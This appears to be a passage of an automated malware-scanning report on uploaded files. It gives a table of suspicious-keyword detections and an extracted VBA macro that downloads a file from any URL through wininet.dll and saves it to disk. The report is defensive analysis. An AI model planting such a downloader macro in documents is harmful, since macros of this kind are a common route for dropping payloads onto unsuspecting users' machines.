  
| Type | Description | Keyword |  
|:---:|:---:|:---:|  
| Suspicious | May open a file | Open |  
| Suspicious | May create an OLE object | CreateObject |  
| Suspicious | May download files from the Internet using PowerShell | DownloadFile |  
| Suspicious | May create a text file | ADODB.Stream |  
| Suspicious | May create a text file | SaveToFile |  
| Suspicious | May write to a file (if combined with Open) | Write |  
| Suspicious | May run code from a DLL | Lib |  
| Suspicious | Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all) | Base64 Strings |  
| IOC | URL | https://analystcave.com/excel-downloading-files-using-vba/ |  
| IOC | Executable file name | wininet.dll |  
  
  
  
#### Macros, total amount found: 1  
  
##### Marco number 1.  
**VBA filename:** testi.bas  
**Sub filename:** testi.bas  
  
**Macro source code:**  
```None
#FROM https://analystcave.com/excel-downloading-files-using-vba/
Private Const INTERNET_FLAG_NO_CACHE_WRITE = &H4000000
Private Declare Function InternetOpen Lib "wininet.dll" Alias "InternetOpenA" (ByVal lpszAgent As String, ByVal dwAccessType As Long, ByVal lpszProxyName As String, ByVal lpszProxyBypass As String, ByVal dwFlags As Long) As Long
Private Declare Function InternetReadBinaryFile Lib "wininet.dll" Alias "InternetReadFile" (ByVal hfile As Long, ByRef bytearray_firstelement As Byte, ByVal lNumBytesToRead As Long, ByRef lNumberOfBytesRead As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal sUrl As String, ByVal sHeaders As String, ByVal lHeadersLength As Long, ByVal lFlags As Long, ByVal lContext As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet.dll" (ByVal hInet As Long) As Integer
 
Sub DownloadFile(sUrl As String, filePath As String, Optional overWriteFile As Boolean)
  Dim hInternet, hSession, lngDataReturned As Long, sBuffer() As Byte, totalRead As Long
  Const bufSize = 128
  ReDim sBuffer(bufSize)
  hSession = InternetOpen("", 0, vbNullString, vbNullString, 0)
  If hSession Then hInternet = InternetOpenUrl(hSession, sUrl, vbNullString, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0)
  Set oStream = CreateObject("ADODB.Stream")
  oStream.Open
  oStream.Type = 1
 
  If hInternet Then
    iReadFileResult = InternetReadBinaryFile(hInternet, sBuffer(0), UBound(sBuffer) - LBound(sBuffer), lngDataReturned)
    ReDim Preserve sBuffer(lngDataReturned - 1)
    oStream.Write sBuffer
    ReDim sBuffer(bufSize)
    totalRead = totalRead + lngDataReturned
    Application.StatusBar = "Downloading file. " & CLng(totalRead / 1024) & " KB downloaded"
    DoEvents
 
    Do While lngDataReturned <> 0
      iReadFileResult = InternetReadBinaryFile(hInternet, sBuffer(0), UBound(sBuffer) - LBound(sBuffer), lngDataReturned)
      If lngDataReturned = 0 Then Exit Do
 
      ReDim Preserve sBuffer(lngDataReturned - 1)
      oStream.Write sBuffer
      ReDim sBuffer(bufSize)
      totalRead = totalRead + lngDataReturned
      Application.StatusBar = "Downloading file. " & CLng(totalRead / 1024) & " KB downloaded"
      DoEvents
    Loop
 
    Application.StatusBar = "Download complete"
    oStream.SaveToFile filePath, IIf(overWriteFile, 2, 1)
    oStream.Close
  End If
  Call InternetCloseHandle(hInternet)
End Sub
```  
  
</details>  

---
  
<details>  
<summary><b>No macros found</b> for `Round_Table_Discussions.doc` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71`  
**Filename:** Round_Table_Discussions.doc  
**Document type:** OLE  
  
For file Round_Table_Discussions.doc: Olevba couldn&#x27;t detect any macros.  
  
</details>  

---
  
<details>  
<summary><b>No macros found</b> for `tee.txt` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855`  
**Filename:** tee.txt  
**Document type:** Text  
  
For file tee.txt: Olevba couldn&#x27;t detect any macros.  
  
</details>  
  
### Footnotes  
[^1]: Report identification value is UUID as a 32-character hexadecimal string.
  
[^2]: See more information about ClamAV filetypes [in here.](https://www.clamav.net/documents/clamav-file-types#cltypes)
  
[^3]: The maliciousness of file is classified based on the objects it contains. Suspicious objects are thought to be: &#x27;/JS&#x27;, &#x27;/JavaScript&#x27;, &#x27;/AA&#x27;, &#x27;/OpenAction&#x27;, &#x27;/AcroForm&#x27;, &#x27;/JBIG2Decode&#x27;, &#x27;/RichMedia&#x27;, &#x27;/Launch&#x27;, &#x27;/EmbeddedFile&#x27;, &#x27;/XFA&#x27;, &#x27;/Colors &gt; 2^24&#x27; 
  
[^4]: VirusTotal was founded in 2004 as a free service that analyzes files and URLs for viruses, worms, trojans and other kinds of malicious content. Their goal is to make the internet a safer place through collaboration between members of the antivirus industry, researchers and end users of all kinds. [Virustotal](https://www.virustotal.com/)
  
